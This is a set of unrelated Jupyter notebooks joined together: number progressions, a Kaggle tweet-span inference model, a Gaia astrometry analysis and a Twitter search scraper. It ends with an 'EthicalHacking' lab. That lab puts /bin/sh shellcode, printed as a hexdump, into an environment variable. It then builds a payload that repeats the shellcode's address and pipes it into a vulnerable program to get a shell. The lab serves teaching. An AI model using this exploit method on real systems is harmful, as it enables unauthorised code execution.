def __init__(self, increment=1, start=0):
"""Create a new arithmetic progression.
increment the fixed constant to add to each term (default 1)
start the first term of the progression (default 0)
"""
# super().__init__(start) # initialize base class
super(ArithmeticProgression, self).__init__(start)
self._increment = increment
def _advance(self): # override inherited version
"""Update current value by adding the fixed increment."""
self._current += self._increment
# -
class GeometricProgression(Progression): # inherit from Progression
"""Iterator producing a geometric progression."""
def __init__(self, base=2, start=1):
"""Create a new geometric progression.
base the fixed constant multiplied to each term (default 2)
start the first term of the progression (default 1)
"""
# super().__init__(start)
super(GeometricProgression, self).__init__(start)
self._base = base
def _advance(self): # override inherited version
"""Update current value by multiplying it by the base value."""
self._current *= self._base
class FibonacciProgression(Progression):
"""Iterator producing a generalized Fibonacci progression."""
def __init__(self, first=0, second=1):
"""Create a new fibonacci progression.
first the first term of the progression (default 0)
second the second term of the progression (default 1)
"""
# super().__init__(first) # start progression at first
super(FibonacciProgression, self).__init__(first)
self._prev = second - first # fictitious value preceding the first
def _advance(self):
"""Update current value by taking sum of previous two."""
self._prev, self._current = self._current, self._prev + self._current
# +
print('Default progression:')
Progression().print_progression(10)
print('Arithmetic progression with increment 5:')
ArithmeticProgression(5).print_progression(10)
print('Arithmetic progression with increment 5 and start 2:')
ArithmeticProgression(5, 2).print_progression(10)
print('Geometric progression with default base:')
GeometricProgression().print_progression(10)
print('Geometric progression with base 3:')
GeometricProgression(3).print_progression(10)
print('Fibonacci progression with default start values:')
FibonacciProgression().print_progression(10)
print('Fibonacci progression with start values 4 and 6:')
FibonacciProgression(4, 6).print_progression(10)
# -
# File: 01_Python_Primer/04_NumericProgressions.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Dependencies
# + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _kg_hide-input=true _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5"
from tweet_utility_scripts import *
from transformers import TFDistilBertModel, DistilBertConfig
from tokenizers import BertWordPieceTokenizer
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Input, Dropout, GlobalAveragePooling1D, GlobalMaxPooling1D, Concatenate, Subtract
# -
# # Load data
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _kg_hide-input=true _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
test = pd.read_csv('/kaggle/input/tweet-sentiment-extraction/test.csv')
print('Test samples: %s' % len(test))
display(test.head())
# -
# # Model parameters
# + _kg_hide-input=true
MAX_LEN = 128
question_size = 3
base_path = '/kaggle/input/qa-transformers/distilbert/'
base_model_path = base_path + 'distilbert-base-uncased-distilled-squad-tf_model.h5'
config_path = base_path + 'distilbert-base-uncased-distilled-squad-config.json'
tokenizer_path = base_path + 'bert-large-uncased-vocab.txt'
input_base_path = '/kaggle/input/19-tweet-train-distilbert-base-uncased-sub-bce/'
model_path_list = glob.glob(input_base_path + '*.h5')
model_path_list.sort()
print('Models to predict:')
print(*model_path_list, sep = "\n")
# -
# # Tokenizer
tokenizer = BertWordPieceTokenizer(tokenizer_path, lowercase=True)
# # Pre-process
# +
test['text'].fillna('', inplace=True)
test["text"] = test["text"].apply(lambda x: x.lower())
x_test = get_data_test(test, tokenizer, MAX_LEN)
# -
# # Model
# +
module_config = DistilBertConfig.from_pretrained(config_path, output_hidden_states=False)
def model_fn():
input_ids = Input(shape=(MAX_LEN,), dtype=tf.int32, name='input_ids')
attention_mask = Input(shape=(MAX_LEN,), dtype=tf.int32, name='attention_mask')
token_type_ids = Input(shape=(MAX_LEN,), dtype=tf.int32, name='token_type_ids')
base_model = TFDistilBertModel.from_pretrained(base_model_path, config=module_config, name="base_model")
sequence_output = base_model({'input_ids': input_ids, 'attention_mask': attention_mask, 'token_type_ids': token_type_ids})
last_state = sequence_output[0]
x = GlobalAveragePooling1D()(last_state)
start = Dense(MAX_LEN, activation='sigmoid')(x)
end = Dense(MAX_LEN, activation='sigmoid')(x)
y_start = Subtract(name='y_start')([start, end])
y_end = Subtract(name='y_end')([end, start])
model = Model(inputs=[input_ids, attention_mask, token_type_ids], outputs=[y_start, y_end])
return model
# -
# # Make predictions
# + _kg_hide-input=true
NUM_TEST_SAMPLES = len(test)  # number of test tweets
test_start_preds = np.zeros((NUM_TEST_SAMPLES, MAX_LEN))
test_end_preds = np.zeros((NUM_TEST_SAMPLES, MAX_LEN))
for model_path in model_path_list:
print(model_path)
model = model_fn()
model.load_weights(model_path)
test_preds = model.predict(x_test)
test_start_preds += test_preds[0] / len(model_path_list)
test_end_preds += test_preds[1] / len(model_path_list)
# -
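# The loop above builds an ensemble by accumulating each checkpoint's logits weighted by `1/len(model_path_list)`, i.e. a running mean. The same scheme on dummy arrays (shapes are illustrative only):

```python
import numpy as np

# Pretend start-logit predictions from three checkpoints for 4 samples x 8 positions.
fold_preds = [np.full((4, 8), v) for v in (1.0, 2.0, 3.0)]

ensemble = np.zeros((4, 8))
for preds in fold_preds:
    ensemble += preds / len(fold_preds)  # running mean over checkpoints

assert np.allclose(ensemble, 2.0)  # mean of 1, 2 and 3
```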
# # Post process
# + _kg_hide-input=true
test['start'] = test_start_preds.argmax(axis=-1)
test['end'] = test_end_preds.argmax(axis=-1)
test['text_len'] = test['text'].apply(lambda x : len(x))
test["end"].clip(0, test["text_len"], inplace=True)
test["start"].clip(0, test["end"], inplace=True)
test['selected_text'] = test.apply(lambda x: decode(x['start'], x['end'], x['text'], question_size, tokenizer), axis=1)
test["selected_text"].fillna('', inplace=True)
# -
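# The two `clip` calls above enforce `0 <= start <= end <= text_len`, so a decoded span can never fall outside its tweet. A toy illustration of the same ordering constraint with `pandas.Series.clip`:

```python
import pandas as pd

df = pd.DataFrame({'start': [5, -1, 90],
                   'end': [3, 10, 120],
                   'text_len': [50, 50, 100]})
df['end'] = df['end'].clip(0, df['text_len'])  # end cannot exceed the text length
df['start'] = df['start'].clip(0, df['end'])   # start cannot exceed end

assert df['end'].tolist() == [3, 10, 100]
assert df['start'].tolist() == [3, 0, 90]
```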
# # Visualize predictions
# + _kg_hide-input=true
display(test.head(10))
# -
# # Test set predictions
# + _kg_hide-input=true
submission = pd.read_csv('/kaggle/input/tweet-sentiment-extraction/sample_submission.csv')
submission['selected_text'] = test["selected_text"]
submission.to_csv('submission.csv', index=False)
submission.head(10)
Model backlog/Inference/19-tweet-inference-distilbert-base-uncased-sub-bce.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Common Sample astrometric properties
# +
import os, glob, getpass, sys, warnings, itertools
import peakutils
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table, join, vstack, hstack, Column, MaskedColumn, unique
from astropy.utils.exceptions import AstropyWarning
from astropy.coordinates import SkyCoord
from astropy import units as u
user = getpass.getuser()
sys.path.append('/Users/' + user + '/Dropbox/my_python_packages')
path = '../'
sys.path.append(path)
from gaia.Basic import Basic as Basic
from gaia.Basic_Plotters import Basic_Plotters as Basic_Plotters
from gaia.cluster_comparison_n import Comparison_n as Comparison
from extra_codes import sample_comp as samp_comp
# +
# Path to data =================================
warnings.simplefilter('ignore', AstropyWarning)
path_control = path + 'sample_control/OPH___control_sample.vot'
path_wise_img = path + 'sample_control/wise_RGB_img.fits'
path_gaia = path + 'sample_gaia/gaia_sample_cleaned.vot'
path_entire = path + 'sample_comp/entire_sample_case_0.vot'
# Read Data ====================================
sample_gaia = Table.read(path_gaia, format = 'votable') ; sample_gaia.label = 'Gaia'
sample_control = Table.read(path_control, format = 'votable')
sample_entire = Table.read(path_entire, format = 'votable')
sample_common = sample_entire[sample_entire['DOH'] == 'YYY']
# Combine with Gaia Cat to get all cols ========
sample_control = join(sample_gaia, Table([sample_control['source_id']])) ; sample_control.label = 'Control'
sample_common = join(sample_gaia, Table([sample_common['source_id']])) ; sample_common.label = 'Common'
sample_entire = join(sample_gaia, Table([sample_entire['source_id']])) ; sample_entire.label = 'Combined'
# Extract Control NOT in Common ================
sample_control_nc = list(set(sample_control['source_id']) - set(sample_common['source_id']))
sample_control_nc = join(Table([sample_control_nc], names = ['source_id']), sample_gaia) ; sample_control_nc.label = 'Control'
print('N Control Sources NOT in common: ', len(sample_control_nc))
# -
# ## 1.- Examine Source sky-projected distribution
# Mark Highest extinction point for later ======
l1688 = SkyCoord('16h26m57s', '-24d31m00s', frame='icrs') # Obtained by eye (see previous notebook, Cell #8)
sample_common['l1688_sep'] = [l1688.separation(SkyCoord(inp['ra'], inp['dec'], unit = (u.deg, u.deg))).degree for inp in sample_common]
sample_common['l1688_sep'].unit = u.degree
sample_common['l1688_sep'].format = '%5.3f'
# +
# Study object distribution =====================
radius = 0.6
sample_common_r06 = sample_common[sample_common['l1688_sep'] < radius]
n_els_r06 = len(sample_common_r06)
print(f'L1688 Core Coordinates: {l1688.ra.deg:17.1f}, {l1688.dec.deg:7.1f}')
print(f'N_Elements inside r < 0.6 deg: {n_els_r06:17d}')
print(f'% Elements inside r < 0.6 deg: {n_els_r06/len(sample_common) * 100.:17.1f}')
# Find how many are new =========================
control_r06_y = join(sample_common_r06, sample_control, keys='source_id')
control_r06_n = np.setdiff1d(sample_common_r06['source_id'], sample_control['source_id'])
control_r06_n = join(sample_common_r06, Table([control_r06_n], names=['source_id']))
print()
print(f'Total Control-N sources: {len(control_r06_n):25d}')
print(f'Total Control-Y sources: {len(control_r06_y):25d}')
# +
# Estimate Density distribution of objects ======
radius = np.arange(0.1,2,0.1)
n_els, dens = [], []
for radii in radius:
els = len(sample_common[sample_common['l1688_sep'] < radii])
n_els.append(els)
dens.append(els/(np.pi * (radii**2)))
fig = plt.figure(figsize=[20,5])
plt.subplot(121)
plt.xlabel('Radius')
plt.ylabel('N_els')
plt.plot(radius, n_els, 'ko')
plt.subplot(122)
plt.xlabel('Radius')
plt.ylabel('Density')
plt.plot(radius, dens, 'ko')
plt.show()
# Investigate distances distribution ===
reg_inn = sample_common[sample_common['l1688_sep'] < 0.6]
reg_out = sample_common[sample_common['l1688_sep'] > 0.6]
textt = itertools.cycle(['Average Distance inside r <0.6degs: ', 'Average Distance outside r <0.6degs:'])
for inp in [reg_inn, reg_out]:
print(f'{next(textt)} {inp["distance"].mean():10.1f} +/- {inp["distance"].std():3.1f}')
# -
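# The density loop above estimates the cumulative surface density n/(pi r^2) of sources inside each radius. As a sanity check, for points spread uniformly over a disk this profile comes out flat (purely synthetic data below):

```python
import numpy as np

rng = np.random.default_rng(0)
# radii of 100,000 points uniform over a disk of radius 2 deg: r = R * sqrt(u)
seps = 2 * np.sqrt(rng.random(100_000))

radius = np.arange(0.1, 2, 0.1)
dens = [np.sum(seps < r) / (np.pi * r**2) for r in radius]

# every aperture recovers the global surface density N / (pi R^2), up to noise
assert np.allclose(dens, 100_000 / (4 * np.pi), rtol=0.3)
```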
# ## 2.- Examine proper motions distribution
# +
# Plot PMRA VS PMDEC ===========================
clusters = [sample_gaia, sample_control_nc, sample_common]
figname = '05_astrometry_analysis_0.pdf'
inp_col_1 = 'pmra'
inp_col_2 = 'pmdec'
label_1 = r'$\mu_{\alpha}^{*}$ [mas yr$^{-1}$]'
label_2 = r'$\mu_{\delta}$ [mas yr$^{-1}$]'
x_err = clusters[0][inp_col_1 + '_error'].mean()
y_err = clusters[0][inp_col_2 + '_error'].mean()
ftsize = 18
xlim = [-16.5,-1.5]
ylim = [-32,-15]
markersizes = itertools.cycle([10,4,4])
colors = itertools.cycle(['grey', 'magenta', 'cyan'])
alphas = itertools.cycle([0.4, 1.0, 1.0])
# Start Plot ==========
fig = plt.figure(figsize=[7,7])
plt.xlim(xlim)
plt.ylim(ylim)
plt.xlabel(label_1, fontsize = ftsize)
plt.ylabel(label_2, fontsize = ftsize)
plt.xticks(fontsize = ftsize)
plt.yticks(fontsize = ftsize)
for cluster in clusters:
plt.plot(cluster[inp_col_1], cluster[inp_col_2], 'o', markersize = next(markersizes),
mew = 0, color = next(colors), alpha = next(alphas), label = cluster.label)
plt.legend(loc = 'upper right', fontsize = ftsize, handletextpad= -0.4, framealpha = 1.0)
plt.show()
fig.savefig(figname, bbox_inches = 'tight')
# +
# Plot Outputs =================================
clusters = Comparison()
clusters.load_clusters(sample_control, cluster_list = [sample_common])
clusters.read_wise_fits(wise_fits_path=path_wise_img)
clusters.plot_wise_img_1(markersize=7, mew=2.5, figname='05_astrometry_analysis_1.pdf',
control_on_top = False, ftsize=22, mec_1='yellow', mec_2='lightgrey', legend_color='no_legend', cl_index = 0)
# -
# ## 3.- Examine histograms & Compare to UpperSco
# +
# Read Galli2018 table ====================================
galli = Table.read('galli_2018.vot') # USco members from Galli et al. 2018 (MNRAS)
galli.convert_bytestring_to_unicode()
coords = SkyCoord(galli['RAJ2000'], galli['DEJ2000'], unit=(u.hourangle, u.deg))
galli['RAJ2000_2'] = coords.ra.deg
galli['DEJ2000_2'] = coords.dec.deg
# Extract Objects with Trigonometric Parallax =============
galli = galli[galli['plxTRIG'].mask == False]
control = True #Dealing with control sample?
if control:
galli_2 = galli[galli['CTRL'] == 'Y']
galli_cols = []
for col in ['RAJ2000_2', 'DEJ2000_2', 'plxTRIG', 'pmRA', 'pmDE']:
print(f'{col:10s} {galli_2[col].mean():10.1f} +/- {galli_2[col].std():5.1f}')
galli_cols.append(galli_2[col].mean())
# Plot Histogram ===========
galli = Basic_Plotters(galli)
hists = galli.plot_3_hist(inp_col_1='plxTRIG', inp_col_2='pmRA', inp_col_3='pmDE')
# +
# Fit 2 Gaussians to the histograms =======================
hist_0 = clusters.plot_3_hist(fig = True, ylabel_1='# Objects')
fig = plt.figure(figsize=[30,10])
index = 1
linewidth = 5
ftsize = 38
cols = ['parallax', 'pmra', 'pmdec']
colors = itertools.cycle(["red"]) # Input must be iterable
fig0 = False
# Parallax Hist ===============
plt.subplot(131)
out = clusters.plot_hist(inp_col = cols[0], linewidth = linewidth, colors= colors, fig = fig0, ftsize=ftsize, x_bins=5, show_legend=True, show_ylabel = '# Objects')
plt.axvline(x=galli_cols[2], linestyle = '-.', linewidth = linewidth*1.5)
# PMRA Hist ===================
print('PMRA Gaussian Fit Results ===================')
plt.subplot(132)
out = clusters.plot_hist(inp_col = cols[1], linewidth = linewidth, colors= colors, fig = fig0, ftsize=ftsize, x_bins=5, xlim=[-16,-2])
gfits_r = samp_comp.gauss_2_fit(out['bin_c'][index], out['bin_h'][index], gauss_1 = (65, -7, 2.), gauss_2 = (10, -14, 2.), fit_LevMar=True, verbose = True, vline=None)
plt.axvline(x=galli_cols[3], linestyle = '-.', linewidth = linewidth*1.5)
print()
# PMDEC Hist ==================
print('PMDEC Gaussian Fit Results ===================')
plt.subplot(133)
out = clusters.plot_hist(inp_col = cols[2], linewidth = linewidth, colors= colors, fig = fig0, ftsize=ftsize, x_bins=4, xlim=[-30,-19])
gfits_d = samp_comp.gauss_2_fit(out['bin_c'][index], out['bin_h'][index], gauss_1 = (70, -25, 0.5), gauss_2 = (15, -22, 0.5), fit_LevMar=True, verbose = True, vline=None)
plt.axvline(x=galli_cols[4], linestyle = '-.', linewidth = linewidth*1.5)
plt.show()
figname = '05_astrometry_analysis_2.pdf'
fig.savefig(figname, bbox_inches = 'tight')
# +
# LATEX Table =================
col_0 = ['Mean', 'FWHM', 'Mean', 'FWHM']
s2fwhm = 2.355 # Sigma >> FWHM for Gaussian Distribution
col_1_m = [gfits_r.mean_0.value, s2fwhm*gfits_r.stddev_0.value, gfits_r.mean_1.value, s2fwhm*gfits_r.stddev_1.value]
col_2_m = [gfits_d.mean_0.value, s2fwhm*gfits_d.stddev_0.value, gfits_d.mean_1.value, s2fwhm*gfits_d.stddev_1.value]
col_1_e = [gfits_r.mean_0_err, s2fwhm*gfits_r.stddev_0_err, gfits_r.mean_1_err, s2fwhm*gfits_r.stddev_1_err]
col_2_e = [gfits_d.mean_0_err, s2fwhm*gfits_d.stddev_0_err, gfits_d.mean_1_err, s2fwhm*gfits_d.stddev_1_err]
names = [' ', 'pmra', 'pmra_e', 'pmdec', 'pmdec_e']
gfits_tb = Table([col_0, col_1_m, col_1_e, col_2_m, col_2_e], names = names)
for col in names[1:]:
gfits_tb[col] = ['{:3.1f}'.format(inp) for inp in gfits_tb[col]]
# Save table ==================
gfits_tb['pmra'] = ['$' + gfits_tb['pmra'][i] + '\pm' + gfits_tb['pmra_e'][i] + '$' for i in range(len(gfits_tb))]
gfits_tb['pmdec'] = ['$' + gfits_tb['pmdec'][i] + '\pm' + gfits_tb['pmdec_e'][i] + '$' for i in range(len(gfits_tb))]
gfits_tb.remove_columns(['pmra_e', 'pmdec_e'])
gfits_tb.write('05_astrometry_analysis_gaussians.tex', overwrite = True)
# !open 05_astrometry_analysis_gaussians.tex
gfits_tb
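# The `s2fwhm = 2.355` factor used above is the Gaussian sigma-to-FWHM conversion, FWHM = 2*sqrt(2 ln 2) * sigma ~ 2.3548 * sigma. A quick numerical check:

```python
import math

s2fwhm = 2 * math.sqrt(2 * math.log(2))  # ~ 2.3548
fwhm = s2fwhm * 1.5                       # FWHM of a Gaussian with sigma = 1.5

assert abs(s2fwhm - 2.3548) < 1e-3
assert abs(fwhm - 3.5322) < 1e-3
```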
# +
# Find Histogram Peaks ==============
# Index of Common Sample in Clusters list (0 = Control, 1 = Common)
hist_index = 1
hists_p_b, hists_p_h = samp_comp.get_hist(hist_0, hist_label='hist_1', hist_index=hist_index)
hists_pmr_b, hists_pmr_h = samp_comp.get_hist(hist_0, hist_label='hist_2', hist_index=hist_index)
hists_pmd_b, hists_pmd_h = samp_comp.get_hist(hist_0, hist_label='hist_3', hist_index=hist_index)
# Parallax =
print('parallax Histogram Peaks')
peaks = peakutils.indexes(hists_p_h, thres=0.5) # peak indexes; thres is a normalized (0-1) threshold
for peak in peaks:
print(f'{hists_p_b[peak]:10.1f}{hists_p_h[peak]:10.0f}')
print()
# PMRA =====
print('PMRA Histogram Peaks')
peaks = peakutils.indexes(hists_pmr_h, thres=0.2) # peak indexes; thres is a normalized (0-1) threshold
for peak in peaks:
print(f'{hists_pmr_b[peak]:10.1f}{hists_pmr_h[peak]:10.0f}')
print()
# PMDEC ====
print('PMDEC Histogram Peaks')
peaks = peakutils.indexes(hists_pmd_h, thres=0.1) # peak indexes; thres is a normalized (0-1) threshold
for peak in peaks:
print(f'{hists_pmd_b[peak]:10.1f}{hists_pmd_h[peak]:10.0f}')
# -
# Obtain Average values ========================
out = [clusters.get_stats_all(cluster_label=label) for label in ['Control', 'Common']]
paper_tb = out[1]
paper_tb.write('05_astrometry_analysis_average.tex', format = 'ascii.latex', overwrite = True)
# !open 05_astrometry_analysis_average.tex
paper_tb
# +
parallaxes = clusters.get_stats('parallax')
para_m = parallaxes['Common']['mean']
para_s = parallaxes['Common']['std']
dist_m = 1000./para_m
dist_u = dist_m - 1000./(para_m + para_s)
dist_b = 1000./(para_m - para_s) - dist_m
print(f'Average distance: {dist_m:9.1F} - {dist_u:3.1F} + {dist_b:3.1F}')
print()
# -
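# The cell above converts the mean parallax (mas) to a distance via d = 1000/parallax pc, with asymmetric error bars from 1000/(parallax +/- sigma). The same arithmetic on round illustrative numbers:

```python
para_m, para_s = 7.0, 0.5                      # mean and std parallax in mas (made up)
dist_m = 1000.0 / para_m                       # central distance in pc
dist_u = dist_m - 1000.0 / (para_m + para_s)   # error toward larger parallax (closer)
dist_b = 1000.0 / (para_m - para_s) - dist_m   # error toward smaller parallax (farther)

assert abs(dist_m - 142.857) < 1e-2
assert abs(dist_u - 9.524) < 1e-2
assert abs(dist_b - 10.989) < 1e-2
```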
# Print min/max parallaxes ============
samples = itertools.cycle(['Control:', 'Common:'])
for inp in [sample_control, sample_common]:
samp = next(samples)
print(f'{samp:10s} {inp["parallax"].min():6.1f} {inp["parallax"].max():7.1f}')
print(f'{samp:10s} {1000./inp["parallax"].min():6.1f} {1000./inp["parallax"].max():7.1f}')
# +
# Add Galactic coordinates and compute XYZ in this frame
test = Basic()
test.load_gaia_cat(sample_common)
test.to_galactic()
test.compute_3D_galactic()
for col in ['X_gal', 'Y_gal', 'Z_gal']:
test.get_stats(col)
# -
sample_comp/05_astrometry_analysis.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] papermill={} tags=["naas", "awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# <img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/>
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# # Twitter - Get tweets from search
# <a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/Twitter/Twitter_Get_tweets_from_search.ipynb" target="_parent"><img src="https://naasai-public.s3.eu-west-3.amazonaws.com/open_in_naas.svg"/></a>
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# **Tags:** #twitter #ifttt #naas_drivers #snippet #content #dataframe
# + [markdown] papermill={} tags=["naas", "awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# **Author:** [<NAME>](https://github.com/dineshh912)
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ## Input
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Import libraries
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
import tweepy
import pandas as pd
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### API Credentials
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
consumer_key = "<KEY>"
consumer_secret = "<KEY>"
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### How to generate API Keys?
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# [Twitter API Documentation](https://developer.twitter.com/en/docs/getting-started)
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ## Model
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Authentication
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
try:
auth = tweepy.AppAuthHandler(consumer_key, consumer_secret)
api = tweepy.API(auth)
except BaseException as e:
    print(f"Authentication failed due to: {str(e)}")
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Functions
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
def getTweets(search_words, date_since, numTweets):
    # Define a pandas dataframe to store the data:
tweets_df = pd.DataFrame(columns = ['username', 'desc', 'location', 'following',
'followers', 'totaltweets', 'usercreated', 'tweetcreated',
'retweetcount', 'text', 'hashtags']
)
# Collect tweets using the Cursor object
# .Cursor() returns an object that you can iterate or loop over to access the data collected.
tweets = tweepy.Cursor(api.search, q=search_words, lang="en", since=date_since, tweet_mode='extended').items(numTweets)
# Store tweets into a python list
tweet_list = [tweet for tweet in tweets]
for tweet in tweet_list:
username = tweet.user.screen_name
desc = tweet.user.description
location = tweet.user.location
following = tweet.user.friends_count
followers = tweet.user.followers_count
totaltweets = tweet.user.statuses_count
usercreated = tweet.user.created_at
tweetcreated = tweet.created_at
retweetcount = tweet.retweet_count
hashtags = tweet.entities['hashtags']
try:
text = tweet.retweeted_status.full_text
except AttributeError:
text = tweet.full_text
tweet_data = [username, desc, location, following, followers, totaltweets,
usercreated, tweetcreated, retweetcount, text, hashtags]
tweets_df.loc[len(tweets_df)] = tweet_data
return tweets_df
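# The `tweets_df.loc[len(tweets_df)] = tweet_data` pattern above appends one record at the next integer index. A minimal illustration of that append idiom:

```python
import pandas as pd

df = pd.DataFrame(columns=['username', 'text'])
for row in [('alice', 'hello'), ('bob', 'world')]:
    df.loc[len(df)] = row  # append one record at the next integer index

assert len(df) == 2
assert df.loc[1, 'username'] == 'bob'
```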
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Initialise these function attributes:
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
search_words = "#jupyterlab OR #python OR #naas OR #naasai"
date_since = "2021-09-21"
numTweets = 50
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ## Output
# + [markdown] papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
# ### Get the tweets
# + papermill={} tags=["awesome-notebooks/Twitter/Twitter_Get_tweets_from_search.ipynb"]
df = getTweets(search_words, date_since, numTweets)
Twitter/Twitter_Get_tweets_from_search.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Stack Overflow - Exploiting with Env Variable
#
# - oftentimes the buffer with the overflow vulnerability is not large enough to fit even the smallest shellcode
# - in situations like this, one can stash the shellcode in an environment variable and overwrite the caller's return address with the address of the shellcode stored in that variable
# - environment variables are loaded into memory every time a program is loaded, by default
# - one can, however, also execute a program without loading the environment variables
# - the **env -i ./program** command, e.g., ignores environment variables when running a program
# - let's look at how we can programmatically find the address of environment variables using C++
# - the C standard library's **getenv()** accepts the name of an environment variable as its only argument and returns that variable's memory address
# - the **getenvaddr.cpp** demo provides a fairly accurate location by accounting for the length of the target program's name, which is also loaded on the stack
# ! cat ./demos/stack_overflow/getenvaddr.cpp
# + language="bash"
# input="./demos/stack_overflow/getenvaddr.cpp"
# output=getenvaddr.exe
#
# echo kali | sudo -S ./compile.sh $input $output
# -
# ! ./getenvaddr.exe
# ! ./getenvaddr.exe PATH ./getenvaddr.exe
# ### Note
# - the `./getenvaddr.exe` program reports a different address when the above command is executed directly from the terminal compared to running it from the Jupyter notebook
# - the address retrieved from the terminal is the one we need, as we'll be exploiting the program directly from the terminal and not from the Jupyter notebook!
# - the following snippet shows the PATH address when executed from the terminal
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./getenvaddr.exe PATH ./getenvaddr.exe
# PATH will be at 0xffffc80a with reference to ./getenvaddr.exe
# ```
#
# ### Export shellcode
# - let's copy `shellcode.bin` from the `demos/shellcode` folder and export it as an environment variable
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ cp ./demos/shellcode/shellcode.bin .
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ wc -c shellcode.bin
# 24 shellcode.bin
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ export SHELLCODE=$(cat shellcode.bin)
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ echo $SHELLCODE | hexdump -C
# 00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 31 |1.Ph//shh/bin..1|
# 00000010 c9 89 ca 6a 0b 58 cd 80 0a |...j.X...|
# 00000019
#
# ```
#
# ### Exploit so_env.cpp
# - let's copy and compile the file and exploit it using the shellcode stashed in the environment variable
# - the program has a buffer of 16 bytes, which is not big enough to hold our 24-byte shellcode
# ! cat ./demos/stack_overflow/so_env.cpp
# + language="bash"
# input="./demos/stack_overflow/so_env.cpp"
# output="so_env.exe"
#
# echo kali | sudo -S ./compile.sh $input $output
# -
# ### crash the program
# ! python -c 'print("A"*10)' | ./so_env.exe
# ! python -c 'print("A"*30)' | ./so_env.exe
# - first, find the address of `SHELLCODE` environment variable with respect to `so_env.exe`
# - repeat the address of `SHELLCODE` enough to overwrite the caller's return address in `bad()`
# - VOILA!
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./getenvaddr.exe SHELLCODE ./so_env.exe
# SHELLCODE will be at 0xffffdfa9 with reference to ./so_env.exe
# ```
# - since the program receives its data from standard input, we'll create a payload file with the repeated SHELLCODE address (little endian)
# ! python -c 'import sys; sys.stdout.buffer.write(b"\xa9\xdf\xff\xff"*20)' > payload_env.bin
# ! wc -c payload_env.bin
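# The one-liner above repeats the SHELLCODE address 20 times in little-endian byte order. `struct.pack` makes the byte ordering explicit (0xffffdfa9 is just the example address from the terminal session above; yours will differ):

```python
import struct

addr = 0xffffdfa9                       # address of SHELLCODE (machine-specific)
payload = struct.pack('<I', addr) * 20  # '<I' = little-endian unsigned 32-bit

assert payload[:4] == b'\xa9\xdf\xff\xff'
assert len(payload) == 80
```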
# - now that payload_env.bin is created, we'll pipe it to the program as standard input
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ cat payload_env.bin - | ./so_env.exe
#
# Enter text: text = ��������������������������������������������������������������������������������
# whoami
# kali
# date
# Thu Dec 17 00:26:43 MST 2020
# exit
#
# ```
# - the shellcode doesn't provide a prompt, and you have to hit enter on a blank line to end the standard input buffer
StackOverflow-EnvVariable.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Maps for my data science project
# + language="html"
# <!-- blank line -->
